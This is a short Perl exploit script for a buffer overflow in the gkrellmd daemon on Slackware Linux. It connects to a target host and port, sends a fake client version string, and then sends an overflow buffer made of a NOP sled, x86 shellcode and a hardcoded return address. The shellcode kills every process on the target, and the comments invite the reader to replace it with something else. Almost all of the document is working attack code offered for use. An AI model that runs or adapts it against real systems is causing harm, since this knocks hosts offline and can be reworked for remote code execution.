#!/usr/bin/perl -s
# kokaninATdtors.net playing with gkrellmd on slackware 9
# advisory on http://packetstormsecurity.nl/0306-exploits/gkrellmd
# I just ripped their code and made it do something useful(?) instead
# shellcode by me this time - wow this is badly formatted(again)
# the shellcode does kill(-1,9);exit(0) - change it

use IO::Socket;
if(!$ARGV[0] || !$ARGV[1])
{ print "usage: ./DSR-geekrellm-linux.pl <host> <port> (default gkrellmd is 19150)\n"; exit(-1); }

$shellcode =    "\x31\xdb".
                "\x4b\x31\xc9\x83\xc1\x09\xb0\x25".
                "\xcd\x80\x31\xdb\xb0\x01\xcd\x80";
# this is ugly:
#                xor %ebx, %ebx
#                dec %ebx
#                xor %ecx, %ecx
#                add $0x9, %ecx
#                movb $0x25, %al
#                int $0x80
#                xorl %ebx, %ebx
#                movb $0x1, %al
#                int $0x80

$host = $ARGV[0];
$port = $ARGV[1];
$ret = pack("l",0xbffff738);
$nop = "\x90";
$buf = $nop x 134 . $shellcode . $ret x 2;

$socket = new IO::Socket::INET
(
Proto    => "tcp",
PeerAddr => $host,
PeerPort => $port,
);

die "unable to connect to $host:$port ($!)\n" unless $socket;

print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have
sleep(1); #might have to adjust this on slow connections
print $socket $buf;

close($socket);